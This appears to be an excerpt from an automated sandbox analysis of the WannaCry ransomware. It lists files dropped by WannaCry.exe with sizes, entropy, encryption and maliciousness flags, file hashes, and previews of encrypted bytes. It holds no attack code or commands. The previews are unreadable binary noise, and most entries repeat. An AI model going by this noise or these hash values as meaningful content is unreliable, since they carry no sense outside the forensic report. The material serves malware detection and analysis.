                                                                              Preview:WANACRY!....:.9U......2..x.%...@i...G.(...4J._.]..0+ 9}......O..."S.,1r.......!..i.y..\p.I...a.".n.s...).^.....@q.l...U...~:....^.N..EZ0....\.e!......fH.5.8v].Y.Q..P...+.n..I`rE....G.,m..V....S..>0Z.......1D:.Q..aB"V......,.c\y.....hW..tJ...}.lY.yQC..........].......M.+v6.1^I.....%.hV[.....8..<..T..2]...,....YB.Q..M..T.n...FY...*F.I.5A.G..{d.D..]l:.=...C0;M.Q`c.....A.QpE(?....rz(+.B(P..g...F....[....|y.....(n..?C.!.n..5.......R.$..P.Ju.....]z..-....3}.N5....A'..&'...........s......u.......j.$.w........&J..a....>..em%...F}.V}W....h.....!.0....$'!$..V....7.co..RPr.N...Z......%.NI.?.79"RG.J....I.|6..Vr7...`.o.s.3.`.Su....m..;e.u..xG.2.{+Wl%.B....v..j..7_..B,.Qe{$..I..O.....b..Uj./u%..t..{4p..\ksk,=m.C.U.`...o....!...x|..z.............>........7..fv.RU..d^.F..\.qXB..S....F...B..6x4m...`.."z>.Fa."...x...g..x..(._..&..0....Y~|..2..K..C..f.....[l....D.0F.e$.......I..S._)..6..d...b.\/..t~..l.m..Z..@.O.0.~g..1.....a......^W.........}..<.........Q.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):352008
                                                                              Entropy (8bit):7.999444234936006
                                                                              Encrypted:true
                                                                              SSDEEP:6144:QS8mYeqmu+ANQ0i6cCo9PdTk5jzPXIW1v+Y51XFluTE:lYLx+b03AczfIu5F
                                                                              MD5:D4A217C98B887D399D794E4DB9DA23D9
                                                                              SHA1:5722EB64FF0D0AFCC02040811E490AD9778B290D
                                                                              SHA-256:FC2AA47B6C5E5785075E294241E07C0D53E9EDAD25E135BB3C6B743A36A127C3
                                                                              SHA-512:CB0ED6EDDC25CDD3321644F9F349D7ABBD8C8049128D0D39C7EE0565A1C1D94407729DA8AFA6D55AED1D0D9B3780090534970348443A62D1D1C5730112371F9A
                                                                              Malicious:true
                                                                              Preview:WANACRY!....:.9U......2..x.%...@i...G.(...4J._.]..0+ 9}......O..."S.,1r.......!..i.y..\p.I...a.".n.s...).^.....@q.l...U...~:....^.N..EZ0....\.e!......fH.5.8v].Y.Q..P...+.n..I`rE....G.,m..V....S..>0Z.......1D:.Q..aB"V......,.c\y.....hW..tJ...}.lY.yQC..........].......M.+v6.1^I.....%.hV[.....8..<..T..2]...,....YB.Q..M..T.n...FY...*F.I.5A.G..{d.D..]l:.=...C0;M.Q`c.....A.QpE(?....rz(+.B(P..g...F....[....|y.....(n..?C.!.n..5.......R.$..P.Ju.....]z..-....3}.N5....A'..&'...........s......u.......j.$.w........&J..a....>..em%...F}.V}W....h.....!.0....$'!$..V....7.co..RPr.N...Z......%.NI.?.79"RG.J....I.|6..Vr7...`.o.s.3.`.Su....m..;e.u..xG.2.{+Wl%.B....v..j..7_..B,.Qe{$..I..O.....b..Uj./u%..t..{4p..\ksk,=m.C.U.`...o....!...x|..z.............>........7..fv.RU..d^.F..\.qXB..S....F...B..6x4m...`.."z>.Fa."...x...g..x..(._..&..0....Y~|..2..K..C..f.....[l....D.0F.e$.......I..S._)..6..d...b.\/..t~..l.m..Z..@.O.0.~g..1.....a......^W.........}..<.........Q.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):243784
                                                                              Entropy (8bit):7.999413284623017
                                                                              Encrypted:true
                                                                              SSDEEP:6144:wL69bA1EBSZsJCbOHEiwiER/ytYUGDDyUSp:Ty1k+yHdEyYvDyDp
                                                                              MD5:125BA7DACDB19ABDDE5723E0E9D54DAB
                                                                              SHA1:67C235273480716789D70E6A09F812AA13C246D9
                                                                              SHA-256:C89CFC64535A95A59E716E5468C751804F66C05B688214E6ADB88F0703A78C9D
                                                                              SHA-512:FD2ADEA387376A8BAFE4AAFC8C0CA22FD694A4BBC90F33C31F46DE068307B575D740202340314E9CB4B95CE27D263A907D3282127392F61640DD229208494DCF
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........$r....M.ch1!..w....?..&.{]E..I..@....L.>b2.......}....W../.....):.H.P...^~.L:...T1._..zo.(Y.L..x.UP.'..."F...M-....'.F...A:..s.xV.v6....4.f..L_.........O..O.}.....P.OU...v.2...gr.i2.C<.B(W3..V......6...c....P...o.-$..yc....a....mvUC...m.......&.......H/...<.)U..*...(.54.>M..@...].nvC.....qY.T.~.%...p0...J.%3.H...`-Md......S..G.O..V.......@...^..RH:..a.....j.Zp..r..t).i,:.Ok.+.j`nV..d.......w....O.Ai(.:t`..f.L.u@...}6.|.....H..ao.}.>6l.p...EE.#_.......l..|.?..d...p...!{x5.K....?.(..2.9Gm.W....kJ....C.Q.R.$.'.....j...=\o..56..x..^q.N.....f..M.i...._..uR-..q.m.,.P...u.GkP.....)NS...GgX.?....,H...)6..8e..S{.....W..".2m&Y.f...-.C`..Tq;M.[.7.6.....$..m|........Q.........[...=...|.|...@....w._.8..1HHn...........f..}....9....,...m2W2..9..=... .i.....=.1<K..V..#f..l...W.Sy|m....Q...i...%.[.W.$a..lX....z&...0.X.....#.....T...*.|.[.{@H.....o4|.P.:d.&..R.LE...O6.5..l5a1.q%..U..!....W.:_]tr...Y-.\HIL.y..w.%..5..='6.......\.T.AW..B..P\.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):243784
                                                                              Entropy (8bit):7.999413284623017
                                                                              Encrypted:true
                                                                              SSDEEP:6144:wL69bA1EBSZsJCbOHEiwiER/ytYUGDDyUSp:Ty1k+yHdEyYvDyDp
                                                                              MD5:125BA7DACDB19ABDDE5723E0E9D54DAB
                                                                              SHA1:67C235273480716789D70E6A09F812AA13C246D9
                                                                              SHA-256:C89CFC64535A95A59E716E5468C751804F66C05B688214E6ADB88F0703A78C9D
                                                                              SHA-512:FD2ADEA387376A8BAFE4AAFC8C0CA22FD694A4BBC90F33C31F46DE068307B575D740202340314E9CB4B95CE27D263A907D3282127392F61640DD229208494DCF
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........$r....M.ch1!..w....?..&.{]E..I..@....L.>b2.......}....W../.....):.H.P...^~.L:...T1._..zo.(Y.L..x.UP.'..."F...M-....'.F...A:..s.xV.v6....4.f..L_.........O..O.}.....P.OU...v.2...gr.i2.C<.B(W3..V......6...c....P...o.-$..yc....a....mvUC...m.......&.......H/...<.)U..*...(.54.>M..@...].nvC.....qY.T.~.%...p0...J.%3.H...`-Md......S..G.O..V.......@...^..RH:..a.....j.Zp..r..t).i,:.Ok.+.j`nV..d.......w....O.Ai(.:t`..f.L.u@...}6.|.....H..ao.}.>6l.p...EE.#_.......l..|.?..d...p...!{x5.K....?.(..2.9Gm.W....kJ....C.Q.R.$.'.....j...=\o..56..x..^q.N.....f..M.i...._..uR-..q.m.,.P...u.GkP.....)NS...GgX.?....,H...)6..8e..S{.....W..".2m&Y.f...-.C`..Tq;M.[.7.6.....$..m|........Q.........[...=...|.|...@....w._.8..1HHn...........f..}....9....,...m2W2..9..=... .i.....=.1<K..V..#f..l...W.Sy|m....Q...i...%.[.W.$a..lX....z&...0.X.....#.....T...*.|.[.{@H.....o4|.P.:d.&..R.LE...O6.5..l5a1.q%..U..!....W.:_]tr...Y-.\HIL.y..w.%..5..='6.......\.T.AW..B..P\.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):533032
                                                                              Entropy (8bit):7.999674011895702
                                                                              Encrypted:true
                                                                              SSDEEP:12288:uA1jPeBtX/VXSvosmBW01dGEnr/o25isdmHzm2AU6ri:XWBZ1Nsv01dGEnr/SsdyzpAU6ri
                                                                              MD5:95EA662541C4C397441D38B5EB4EE6EB
                                                                              SHA1:73ACFB59E62300D776B891BF94750BD2BD9996C9
                                                                              SHA-256:9EF34AB94B76E35A32E03B1F46E3A904DAFECE10D3ACC6EA2249AD871383D75A
                                                                              SHA-512:CA08FFEEE1F5A483A242E30BD2F2F326824AEC6BAF2C64D272910DAAF7EC46D3E22596F935F396911ED1FC8A57F8FEED5781741D765F4F88A5217716EB602C0A
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....?.="G.5oJ.;p.$|s...p^.{;..(....!.~.F.....b.P...0.T.`x2...qLH.O!....w.?\@..7.9X.;..@....9.3u.u..rt)b.b..'./.<*7`ow?E.."R=.c.r.#T...gu.}:..7.%..4.1t:......B.-..`..........|F.yL...$/...q.....I>..t.../...w.mT..v.BqdO.....`..N.R.....(..,.....Y.}.\.=.....!......4..F..L.g..j..#.../.n)......;.....d..F......IH...y`.a.J..R.....!*..K..)A.P..cL...#........V #M.HC........>.)c..2D..1Z.)f0./2.5........?.....[."...W.u....p...Z>h...wL...3.c...j .{......@.T."=..g..-..j..b2..O8..W..=.ZH.M...<...wF:.!q.P)(.W..F.7....p2H.N. o..).,...g...X}...!g$ ....D..c...:.s*d.p.......b1.._..q...... .P...Z.........W.w.._..".2X.b....8.c.#"4..(..*.V|`.E..#6[Uo.5.d+N%......}...V.5.$v....SeGtD...}.p.0..$...z[...a....{6.R.U.P>T9.1d..v.....Y.....HOZy>H{.}..1..z...6LFr[D..P..@..-.l.K..e....H...@.....-.U.'.....X]Ef...a\}5.uU.`......y.5.B...'..3....Q.i.^$...)....t."..j..s.@...~..=.:_jf..7...O..j.....M.@...kX!A)e8`>v.+...>.Z..`~x.3.B....}g3..,.x9ivZ...L..6&...xV.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):533032
                                                                              Entropy (8bit):7.999674011895702
                                                                              Encrypted:true
                                                                              SSDEEP:12288:uA1jPeBtX/VXSvosmBW01dGEnr/o25isdmHzm2AU6ri:XWBZ1Nsv01dGEnr/SsdyzpAU6ri
                                                                              MD5:95EA662541C4C397441D38B5EB4EE6EB
                                                                              SHA1:73ACFB59E62300D776B891BF94750BD2BD9996C9
                                                                              SHA-256:9EF34AB94B76E35A32E03B1F46E3A904DAFECE10D3ACC6EA2249AD871383D75A
                                                                              SHA-512:CA08FFEEE1F5A483A242E30BD2F2F326824AEC6BAF2C64D272910DAAF7EC46D3E22596F935F396911ED1FC8A57F8FEED5781741D765F4F88A5217716EB602C0A
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....?.="G.5oJ.;p.$|s...p^.{;..(....!.~.F.....b.P...0.T.`x2...qLH.O!....w.?\@..7.9X.;..@....9.3u.u..rt)b.b..'./.<*7`ow?E.."R=.c.r.#T...gu.}:..7.%..4.1t:......B.-..`..........|F.yL...$/...q.....I>..t.../...w.mT..v.BqdO.....`..N.R.....(..,.....Y.}.\.=.....!......4..F..L.g..j..#.../.n)......;.....d..F......IH...y`.a.J..R.....!*..K..)A.P..cL...#........V #M.HC........>.)c..2D..1Z.)f0./2.5........?.....[."...W.u....p...Z>h...wL...3.c...j .{......@.T."=..g..-..j..b2..O8..W..=.ZH.M...<...wF:.!q.P)(.W..F.7....p2H.N. o..).,...g...X}...!g$ ....D..c...:.s*d.p.......b1.._..q...... .P...Z.........W.w.._..".2X.b....8.c.#"4..(..*.V|`.E..#6[Uo.5.d+N%......}...V.5.$v....SeGtD...}.p.0..$...z[...a....{6.R.U.P>T9.1d..v.....Y.....HOZy>H{.}..1..z...6LFr[D..P..@..-.l.K..e....H...@.....-.U.'.....X]Ef...a\}5.uU.`......y.5.B...'..3....Q.i.^$...)....t."..j..s.@...~..=.:_jf..7...O..j.....M.@...kX!A)e8`>v.+...>.Z..`~x.3.B....}g3..,.x9ivZ...L..6&...xV.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):44792
                                                                              Entropy (8bit):7.996044163029472
                                                                              Encrypted:true
                                                                              SSDEEP:768:7730YxJ5vc4XrfZEJ516vp9KVHUb7jahDa7pc1g1J9qP/CYnfiMH3mn6kt/t23:7DXxJ5vH7fmJjI9I67OZ31g1jqHC+ie9
                                                                              MD5:06E9DE67F4106B1BD98A616EFF63C29E
                                                                              SHA1:8196FB0155BF7FBC2143C52CCC9A1E3CF359C379
                                                                              SHA-256:E19FF0160057AB1E542C9928DB31EE6268001ED5E15B15E91E02636C388EE654
                                                                              SHA-512:DE0AC4DD480ABEB9E9BA333C8648E1D0E1EE6B185882A943C211D1638B838C4A7BC2A45E3721AB36E3407B7CBC8E6572B3709FC5C0931F215E4B44088E19EEB5
                                                                              Malicious:true
                                                                              Preview:WANACRY!....7m. .W.lR.6Z..`.C.D..:.`....J.....h..X-.'.D_.lw.O..m....:"-+i...#.2<....-L.....,...K.d.FB.?.....a.v8|^.h...7.2@n..4Yc@.4.....w.6..V}.;...VBo..oOp..$|..>.VW.u...>L2.....3 .|.@Y.|..6.J.......P)*..-d.^Q.@.R@.F.O.....l...Z....L.U.:.{:..*.k...S...8Z............C:.....m...G...}P..l...._...5.S..#.hU&..jV...j!.o.......".L...._..,A.&2....N./D.......(S..NF.]{$5....^..f....m.%<J...R.......9...V.}Pg.A.Z.@1x..s...~..g..... k...Y...|#..nE.l...i../8;A}w.T'.......o.h...qE.aYl#.fa.j.}Y.K."2.hd#...Z.nY .....4.W.E.B.r[fI....=..;.{.5..5&.Tp..F...E.-..;...ms?..`.z...........@..|...hP..G....Y.B#....D...D.!sj...>JE..}.b..6.....;.....S.TF............4WM.6...[P.3.\.^..TnY...).._.......(..]J.V.CB1&.[...c.p..}.s)...?.F..%_cR.$_.Q_Z8.3........[.]..r.....;.x....h..Z..H...8~).l/..d.\......8b...a^/...;f..l.A..Z.~g1...!..9../.L.]-TL$j.......dXLj..J..]...Lw.p.l..%.*.D.l.*]....U.R..&.....2.......M"3.wQf...];L.Jem..T.!..F.X..:.`_..V.!.m{.t......(.c..-.`]..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):44792
                                                                              Entropy (8bit):7.996044163029472
                                                                              Encrypted:true
                                                                              SSDEEP:768:7730YxJ5vc4XrfZEJ516vp9KVHUb7jahDa7pc1g1J9qP/CYnfiMH3mn6kt/t23:7DXxJ5vH7fmJjI9I67OZ31g1jqHC+ie9
                                                                              MD5:06E9DE67F4106B1BD98A616EFF63C29E
                                                                              SHA1:8196FB0155BF7FBC2143C52CCC9A1E3CF359C379
                                                                              SHA-256:E19FF0160057AB1E542C9928DB31EE6268001ED5E15B15E91E02636C388EE654
                                                                              SHA-512:DE0AC4DD480ABEB9E9BA333C8648E1D0E1EE6B185882A943C211D1638B838C4A7BC2A45E3721AB36E3407B7CBC8E6572B3709FC5C0931F215E4B44088E19EEB5
                                                                              Malicious:true
                                                                              Preview:WANACRY!....7m. .W.lR.6Z..`.C.D..:.`....J.....h..X-.'.D_.lw.O..m....:"-+i...#.2<....-L.....,...K.d.FB.?.....a.v8|^.h...7.2@n..4Yc@.4.....w.6..V}.;...VBo..oOp..$|..>.VW.u...>L2.....3 .|.@Y.|..6.J.......P)*..-d.^Q.@.R@.F.O.....l...Z....L.U.:.{:..*.k...S...8Z............C:.....m...G...}P..l...._...5.S..#.hU&..jV...j!.o.......".L...._..,A.&2....N./D.......(S..NF.]{$5....^..f....m.%<J...R.......9...V.}Pg.A.Z.@1x..s...~..g..... k...Y...|#..nE.l...i../8;A}w.T'.......o.h...qE.aYl#.fa.j.}Y.K."2.hd#...Z.nY .....4.W.E.B.r[fI....=..;.{.5..5&.Tp..F...E.-..;...ms?..`.z...........@..|...hP..G....Y.B#....D...D.!sj...>JE..}.b..6.....;.....S.TF............4WM.6...[P.3.\.^..TnY...).._.......(..]J.V.CB1&.[...c.p..}.s)...?.F..%_cR.$_.Q_Z8.3........[.]..r.....;.x....h..Z..H...8~).l/..d.\......8b...a^/...;f..l.A..Z.~g1...!..9../.L.]-TL$j.......dXLj..J..]...Lw.p.l..%.*.D.l.*]....U.R..&.....2.......M"3.wQf...];L.Jem..T.!..F.X..:.`_..V.!.m{.t......(.c..-.`]..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):104008
                                                                              Entropy (8bit):7.998314745919565
                                                                              Encrypted:true
                                                                              SSDEEP:3072:GZ5wEX+oCvmhKSFbLw3CyM+q7Efp9qhdclfAHH:A+owWKZvZf/qXcl4HH
                                                                              MD5:75A1AED275184397C5E4069B4E2B5C0E
                                                                              SHA1:46847C1A3C7DFBEDF0FEE0273A13A02FFDDEE694
                                                                              SHA-256:B1EB2C5F31ABF550A93E8B90AF2B601C1CB164F9E2910AA2FEAC43CB77E2876B
                                                                              SHA-512:D8629A9AA7B15C8F61CD74A37660A53CAA1FC4387F4C35DCE92FFCC21CC686EEE1BE18C03848A44F2A02B15D515DD6E1F30742A4FC1325BA21B380397AB23D17
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......l..5...AP.Jo......S..)s.392S....5..Z.,.CE..M..fh..t.X.k.A.++..8y.5...$M....7.J.c.d.=/...m....E............-.q....g.7P..CL!.l....|>.}.%6.+...l*..r87...}...Z.......P.J3.....K....:...1..J....y5.....n..2O..)h...~..-...........'.o.........%........t...J@,.*...T.M.:...Te.....T..].....v.(Y44.......G..z....C8<.`....Z........o1]Ut\.k...........T|......j...m.R<....Vc..wZ.$ u ..,..}4Q.ap.r......G..Zg...H.".`...QE.......Q.G....wl...Z....bER.:M...c.]./.?H..?.|rq..)d...^.....j..0..f. .{..t.i...}*a...........C`.....!.{5......$..Mf..D...F`...............M.l.$5.@..>..6Y.%.u..k..s....~.pl..f..$.G.......j..T..Q..)M...6].6..trC+.gO...8..g...st../c8.......F.x*...<....b.1..@qr.6..q...c.vF..G.....hw8O..m.Sf.<~..'k.Kw.G..0.-.s.w...h.&.>-..J..q,..-b.#"..|....I....O..O$E.D.K....0..,:._..s.qw.lI..v*e..R.s:w.[.@._.s.o..r}M.g/..s;.......6..#.....!..P...q..#...Vp~x....#W'}...z.Q.4...l;\.va.........]0D.=.....A.&.x..w).....&...m. [n.......O.l._...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):104008
                                                                              Entropy (8bit):7.998314745919565
                                                                              Encrypted:true
                                                                              SSDEEP:3072:GZ5wEX+oCvmhKSFbLw3CyM+q7Efp9qhdclfAHH:A+owWKZvZf/qXcl4HH
                                                                              MD5:75A1AED275184397C5E4069B4E2B5C0E
                                                                              SHA1:46847C1A3C7DFBEDF0FEE0273A13A02FFDDEE694
                                                                              SHA-256:B1EB2C5F31ABF550A93E8B90AF2B601C1CB164F9E2910AA2FEAC43CB77E2876B
                                                                              SHA-512:D8629A9AA7B15C8F61CD74A37660A53CAA1FC4387F4C35DCE92FFCC21CC686EEE1BE18C03848A44F2A02B15D515DD6E1F30742A4FC1325BA21B380397AB23D17
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......l..5...AP.Jo......S..)s.392S....5..Z.,.CE..M..fh..t.X.k.A.++..8y.5...$M....7.J.c.d.=/...m....E............-.q....g.7P..CL!.l....|>.}.%6.+...l*..r87...}...Z.......P.J3.....K....:...1..J....y5.....n..2O..)h...~..-...........'.o.........%........t...J@,.*...T.M.:...Te.....T..].....v.(Y44.......G..z....C8<.`....Z........o1]Ut\.k...........T|......j...m.R<....Vc..wZ.$ u ..,..}4Q.ap.r......G..Zg...H.".`...QE.......Q.G....wl...Z....bER.:M...c.]./.?H..?.|rq..)d...^.....j..0..f. .{..t.i...}*a...........C`.....!.{5......$..Mf..D...F`...............M.l.$5.@..>..6Y.%.u..k..s....~.pl..f..$.G.......j..T..Q..)M...6].6..trC+.gO...8..g...st../c8.......F.x*...<....b.1..@qr.6..q...c.vF..G.....hw8O..m.Sf.<~..'k.Kw.G..0.-.s.w...h.&.>-..J..q,..-b.#"..|....I....O..O$E.D.K....0..,:._..s.qw.lI..v*e..R.s:w.[.@._.s.o..r}M.g/..s;.......6..#.....!..P...q..#...Vp~x....#W'}...z.Q.4...l;\.va.........]0D.=.....A.&.x..w).....&...m. [n.......O.l._...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):217800
                                                                              Entropy (8bit):7.999205909537082
                                                                              Encrypted:true
                                                                              SSDEEP:6144:NWvRI0EonPHdqAsrp/SlUtP62ONd7Hv49qn4+S7XFa3Asq:N4NEydySlMC2yg9C4HmY
                                                                              MD5:6CB5882322BDD8E922AF6D8BD349B793
                                                                              SHA1:A0C34791A52597B060EE17BFA5A2F3B356D2E197
                                                                              SHA-256:DEDFE0A084CC10F16CA7A88957B3D17E0B2CD24DFA98F2FB898D6CC1C8DA06B2
                                                                              SHA-512:C95974028FBFDC5A074A6D0BA848671E28F12B65129A94FB08EC60827A95E26FAA1EC69061ADF78EE52CB6985385F5E0BD8F57CDC6C4E185A3656CA00265180B
                                                                              Malicious:true
                                                                              Preview:WANACRY!..........b($3y.2..-.Np.../...".'.h.l..G.i&.k....Z...C.!.x.M.Y.tSA.yDsa.~\.i+..{......?L....6=.u..V.....G9o.CJ#*..k@....0....N..}.....6g.G9ql....FW.B.`R.q....~~{.DN.u.e...I+\.p.y......@...h,j...,.{....DC=.J.P...h.P.BA.si.4d...jN.E..Xb...I.M.\.......Q..........E...z..Z..h.c.CD..{.Z_...*5tv[k..H.R0e.M:..{<......{.../.......iC0....Qk.....Xo.....?....i.....S.b.G..Nt....S.........[H&...W'....c..h..w....N...ur.W...b.`xw.R..?.Z~f.....X.o..D.wP.!.)_...j.....v...F.o.Z?^..........&.qJ..8.....;......S.N...\P4....>2.|.....?..V8........m..me...A}.D.......tpk4R....V........$.......c1.Bm3e..tp...O}^..hIv......!....]/5...EIe'z...:...m.I....=.....*a..smL.\.....$.M.*.I...&7.g..0.aC.u.Gr../F(.s.3..S....... .x.=XC.z{XM2.=....t..0...6....8.v.....A.c3.P.....C.P.PzB*..+....?8.n.;]......(...L........\.....A.]...........U._.w{....".p.w....R.;...YY....=g.N.....?.....~......;.iD..D.../.7dF.YxQ.%T\...K..a&.f.\t.3.E`....He;o.7.$.VL6.r..)l._5h.P.x-.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):217800
                                                                              Entropy (8bit):7.999205909537082
                                                                              Encrypted:true
                                                                              SSDEEP:6144:NWvRI0EonPHdqAsrp/SlUtP62ONd7Hv49qn4+S7XFa3Asq:N4NEydySlMC2yg9C4HmY
                                                                              MD5:6CB5882322BDD8E922AF6D8BD349B793
                                                                              SHA1:A0C34791A52597B060EE17BFA5A2F3B356D2E197
                                                                              SHA-256:DEDFE0A084CC10F16CA7A88957B3D17E0B2CD24DFA98F2FB898D6CC1C8DA06B2
                                                                              SHA-512:C95974028FBFDC5A074A6D0BA848671E28F12B65129A94FB08EC60827A95E26FAA1EC69061ADF78EE52CB6985385F5E0BD8F57CDC6C4E185A3656CA00265180B
                                                                              Malicious:true
                                                                              Preview:WANACRY!..........b($3y.2..-.Np.../...".'.h.l..G.i&.k....Z...C.!.x.M.Y.tSA.yDsa.~\.i+..{......?L....6=.u..V.....G9o.CJ#*..k@....0....N..}.....6g.G9ql....FW.B.`R.q....~~{.DN.u.e...I+\.p.y......@...h,j...,.{....DC=.J.P...h.P.BA.si.4d...jN.E..Xb...I.M.\.......Q..........E...z..Z..h.c.CD..{.Z_...*5tv[k..H.R0e.M:..{<......{.../.......iC0....Qk.....Xo.....?....i.....S.b.G..Nt....S.........[H&...W'....c..h..w....N...ur.W...b.`xw.R..?.Z~f.....X.o..D.wP.!.)_...j.....v...F.o.Z?^..........&.qJ..8.....;......S.N...\P4....>2.|.....?..V8........m..me...A}.D.......tpk4R....V........$.......c1.Bm3e..tp...O}^..hIv......!....]/5...EIe'z...:...m.I....=.....*a..smL.\.....$.M.*.I...&7.g..0.aC.u.Gr../F(.s.3..S....... .x.=XC.z{XM2.=....t..0...6....8.v.....A.c3.P.....C.P.PzB*..+....?8.n.;]......(...L........\.....A.]...........U._.w{....".p.w....R.;...YY....=g.N.....?.....~......;.iD..D.../.7dF.YxQ.%T\...K..a&.f.\t.3.E`....He;o.7.$.VL6.r..)l._5h.P.x-.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.152563903298448
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkE1sRNvveBno86EXOZRLdDy+hyhMlfgGzLrQ02N06IGYWXJoCt:bkE2RNvvoo8NXMxhcW4Gk02NDIGYfCt
                                                                              MD5:76047B06BB60B4A4DE8A1F746A27C453
                                                                              SHA1:2592E422A7DF42B6749B27663CFDA0B55FE62EB1
                                                                              SHA-256:1579466A239F41E7B40FE81AD7D94E3662A95D5E6240E9D85964BCD519CCD1EF
                                                                              SHA-512:ECFD0A2F796942100CBDEAD4807424FF08EB2B42B79715F55F6ADFFBB89E6BE94365B413EA07B2327AF1080EEB8DB169834CA1A120BA471320F3F9CD0068A88F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......I...k...i.(.ml0..........;g.....Q...0.O,..........(.&U...V6...d.@.2.,...a....j.-............6..3h5..a....q.\..X.].v...d...3......k5.A.D.0.wO.;v..Q.P..C....)..;......+.B...g5gV...\..s.W..&....Kz........wI.e.....O.....k.eIpf.36X..g..rf.S..............g.A....-...7..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.152563903298448
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkE1sRNvveBno86EXOZRLdDy+hyhMlfgGzLrQ02N06IGYWXJoCt:bkE2RNvvoo8NXMxhcW4Gk02NDIGYfCt
                                                                              MD5:76047B06BB60B4A4DE8A1F746A27C453
                                                                              SHA1:2592E422A7DF42B6749B27663CFDA0B55FE62EB1
                                                                              SHA-256:1579466A239F41E7B40FE81AD7D94E3662A95D5E6240E9D85964BCD519CCD1EF
                                                                              SHA-512:ECFD0A2F796942100CBDEAD4807424FF08EB2B42B79715F55F6ADFFBB89E6BE94365B413EA07B2327AF1080EEB8DB169834CA1A120BA471320F3F9CD0068A88F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......I...k...i.(.ml0..........;g.....Q...0.O,..........(.&U...V6...d.@.2.,...a....j.-............6..3h5..a....q.\..X.].v...d...3......k5.A.D.0.wO.;v..Q.P..C....)..;......+.B...g5gV...\..s.W..&....Kz........wI.e.....O.....k.eIpf.36X..g..rf.S..............g.A....-...7..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.1661407830067665
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEs2pb2sHX6ud1wYJRjAjnA0A7KAsgPGM7atlpI1Gm0t9ZRiO:bkEag/JKBA7KABGMeX2UrZRiO
                                                                              MD5:07966C86970196054201DED6A8B763CF
                                                                              SHA1:C317D8F7E5A646BE39CE3B806F8EA626C6FAC011
                                                                              SHA-256:674155161BC19DEFE955A8C314D4E49C29624C9C16A0B3F11CD63FC60968D332
                                                                              SHA-512:E39FFEBCE7776155912ADA5CF9380BCA41E574F64573DBB695093CA9D4BF7728FDA85ED87FA1C7466220B496CBEE2B2FB71BE424E7A4DB1A116738A660C38282
                                                                              Malicious:false
                                                                              Preview:WANACRY!....P.rf.g....m..r|.E..K.uQ$T6...I.[.U...8l&Up.a....l].\x.%.....H=Y.....3...*.........^4...P.!.)...,..[.q..P.U2.../..v./p.....Lo[...MmL.\&..B@..91..x....$...:0...B...:.+1.3.}%(...U.)*.&...UC...@.. ..N7>6Q1......{.U.u.a1..h...i.6..z....!wN+...X...............O .]....5..d.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.1661407830067665
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEs2pb2sHX6ud1wYJRjAjnA0A7KAsgPGM7atlpI1Gm0t9ZRiO:bkEag/JKBA7KABGMeX2UrZRiO
                                                                              MD5:07966C86970196054201DED6A8B763CF
                                                                              SHA1:C317D8F7E5A646BE39CE3B806F8EA626C6FAC011
                                                                              SHA-256:674155161BC19DEFE955A8C314D4E49C29624C9C16A0B3F11CD63FC60968D332
                                                                              SHA-512:E39FFEBCE7776155912ADA5CF9380BCA41E574F64573DBB695093CA9D4BF7728FDA85ED87FA1C7466220B496CBEE2B2FB71BE424E7A4DB1A116738A660C38282
                                                                              Malicious:false
                                                                              Preview:WANACRY!....P.rf.g....m..r|.E..K.uQ$T6...I.[.U...8l&Up.a....l].\x.%.....H=Y.....3...*.........^4...P.!.)...,..[.q..P.U2.../..v./p.....Lo[...MmL.\&..B@..91..x....$...:0...B...:.+1.3.}%(...U.)*.&...UC...@.. ..N7>6Q1......{.U.u.a1..h...i.6..z....!wN+...X...............O .]....5..d.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):217800
                                                                              Entropy (8bit):7.999145620529258
                                                                              Encrypted:true
                                                                              SSDEEP:3072:TFGHG0An5ARPOHfKm/hS9pPT4AQ4Bk2uzNsPi+N+vlOEVi+dBr/PLDRLnC:eAn5ABIKmJ0GAWfzNs+wlizXRjC
